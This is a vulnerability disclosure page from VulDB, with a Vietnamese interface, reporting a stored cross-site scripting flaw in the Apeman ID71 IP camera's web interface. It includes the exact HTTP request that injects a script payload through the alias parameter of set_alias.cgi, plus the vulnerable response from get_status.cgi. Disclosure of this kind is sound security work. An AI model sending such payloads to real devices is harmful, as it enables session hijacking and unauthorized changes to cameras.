Gửi #668771: Apeman IP CAMERA Model ID71 appversion: EN75.8.53.20 Cross Site Scriptingthông tin

tiêu đề	Apeman IP CAMERA Model ID71 appversion: EN75.8.53.20 Cross Site Scripting
Mô tả	The camera’s web interface does not properly encode the user-supplied `alias` value before embedding it into JavaScript. When `alias` is set via `set_alias.cgi`, it is stored and later emitted by `get_status.cgi` as a JavaScript string without context-appropriate encoding. An authenticated attacker can inject arbitrary JavaScript that will execute in the browser of any user viewing pages that consume this variable, enabling session hijacking and unauthorized actions within the victim’s session. To store the XSS we can use the following request: # Request GET /set_alias.cgi?alias=%3Cscript%3Ealert(1)%3C%2Fscript%3E&next_url=alias.htm&loginuse=admin&loginpas=XXXXXXXX HTTP/1.1 Host: 192.168.1.151:53370 To retrieve the stored value use the following request: # Request GET /get_status.cgi HTTP/1.1 Host: 192.168.1.151:53370 ..... # Response: HTTP/1.1 200 OK Date: Sat Oct 4 11:52:04 2025 Server: GoAhead-Webs var alias="<script>alert(1)</script>"; var deviceid="VSTD1744XXXXX"; var sys_ver="x.x.x.x"; var app_version="EN75.8.53.20"; var oem_id="XXXX"; var now=17595XXXXXX; ...SNIP.... Impact - Confidentiality: High — theft of session tokens, credentials, and configuration data - Integrity: High — arbitrary actions in the victim’s authenticated context (change settings, add users) Additional information and images: https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/XSS-Info.md Vendor status: The vendor APEMAN no longer sells this camera model. It appears to have been discontinued or rebranded. Attempts to contact the vendor were unsuccessful. From my research, it seems that Apeman no longer sells or officially supports security cameras, including the Model ID71. Their current official website (https://apemans.com) focuses exclusively on projectors and dashcams, with no mention of their legacy IP camera line. Because of this, there is no longer an active vendor website or support portal that references the ID71 camera. Historical product information is only available through third-party sources (e.g., archived sales pages, second-hand listings, and user forums).
Nguồn	⚠️ https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/apeman_id71_xss_poc.py
Người dùng	juliourena (UID 90207)
Đệ trình	04/10/2025 15:01 (cách đây 8 các tháng)
Kiểm duyệt	16/10/2025 13:29 (12 days later)
Trạng thái	được chấp nhận
Mục VulDB	328797 [Apeman ID71 EN75.8.53.20 /set_alias.cgi alias Tập lệnh chéo trang]
điểm	20

◂ Trước Tổng Quan Tiếp theo ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!